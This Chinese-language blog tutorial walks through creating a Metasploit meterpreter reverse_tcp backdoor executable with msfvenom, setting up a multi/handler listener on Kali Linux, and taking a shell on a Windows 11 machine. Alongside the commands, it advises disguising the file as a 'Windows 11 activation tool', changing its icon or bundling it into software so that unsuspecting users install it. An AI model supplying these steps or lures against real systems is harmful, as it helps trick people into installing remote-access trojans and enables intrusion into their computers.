目錄
一、MSF簡介
滲透環(huán)境
二、滲透流程
1.Kali Linux進入Root模式
?2.生成可執(zhí)行文件
3.運行msfconsole命令
?4.配置參數
?5.在靶機Windows11打開可執(zhí)行文件
6.滲透
一、MSF簡介
Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來生成后門的軟件。
MSFvenom是Msfpayload和Msfencode的組合,將這兩個工具都放在一個Framework實例中。
滲透環(huán)境
使用Kali Linux進行演示操作
目標靶機:Windows11
軟件:Msfvenom、Msfconsole(Kali Linux系統(tǒng)內置)
二、滲透流程
1.Kali Linux進入Root模式
不在Root模式下運行可能會出現操作者權限不夠的提示,為了避免命令執(zhí)行失敗,第一步先將Kali進入Root管理員模式。執(zhí)行命令之后輸入Kali的密碼時,密碼是被隱藏的。
命令:sudo su
?2.生成可執(zhí)行文件
命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地ip>?LPORT=<本地端口號>?–f exe –o?<文件名>.exe
<本地ip>寫自己Kali Linux的IP地址,用ifconfig就能查看自己Kali的IP地址
<本地端口號>自己隨便設置一個沒有被占用的端口號,如果端口號被占用那么文件會生成失敗,換一個端口號就性
文件名可以隨便寫自己喜歡的名字,比如寫Windows11激活工具等可能更容易讓目標主機上鉤
當然MSF也可以用來滲透Android、Mac、CentOS等
?
這個就是Kali Linux主機的IP地址
?接下來運行命令來生成可執(zhí)行文件
?把生成的可執(zhí)行文件放入目標靶機Windows11中
3.運行msfconsole命令
命令:msfconsole
?4.配置參數
(1)命令: use exploit/multi/handler(選擇模塊)
(2)命令: set payload windows/meterpreter/reverse_tcp(選擇攻擊模塊)
(3)命令: set LhOST 192.168.88.134(填寫自己主機的IP地址)
(4)命令: set lport 1234(填寫剛才生成文件時的端口號)
(5)命令: show options(查看設置參數)
(6)命令: exploit -z -j(后臺執(zhí)行)
?5.在靶機Windows11打開可執(zhí)行文件
在這里我們可以把文件稍微偽裝一下,例如修改圖標或者將其捆綁在某些軟件中,當用戶打開軟件時會自動安裝在其電腦上。
6.滲透
命令:sessions(查看上鉤的目標靶機)
命令:sessions -i -1(選擇要攻擊的用戶)
?文章來源:http://www.zghlxwxcb.cn/news/detail-461876.html
這個時候就已經拿到Windows11的shell啦^ ^文章來源地址http://www.zghlxwxcb.cn/news/detail-461876.html
到了這里,關于Kali Linux利用MSF滲透Windows11電腦的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!